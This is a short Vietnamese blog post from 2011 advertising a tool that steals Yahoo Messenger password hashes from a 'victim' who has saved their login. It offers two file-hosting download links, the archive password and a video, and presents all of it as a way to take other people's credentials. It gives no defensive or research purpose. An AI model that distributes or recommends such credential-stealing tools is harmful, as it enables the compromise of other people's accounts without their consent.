Yahoo Mesenger Password Hash Stolen (Y!M PHS)

đăng 08:44, 11 thg 8, 2011 bởi Anh Levan   [ cập nhật 08:45, 11 thg 8, 2011 bởi Anh Levan ]

Yahoo Mesenger Password Hash Stolen (Y!M PHS)

Tool này dùng để trộm pass hash của Y!M khi victim sử dụng tính năng Remember my ID & password.

- Các bạn down tool và video để rõ hơn!

Download Now: (pass: choiblog.tk)
http://www.ziddu.com/download/7868532/cohd-YMPassHashStolenYMPHS.rar.html
or
http://www.4shared.com/file/141446403/34d9f371/co_hd-YM_Pass_Hash_Stolen__YM_PHS_.html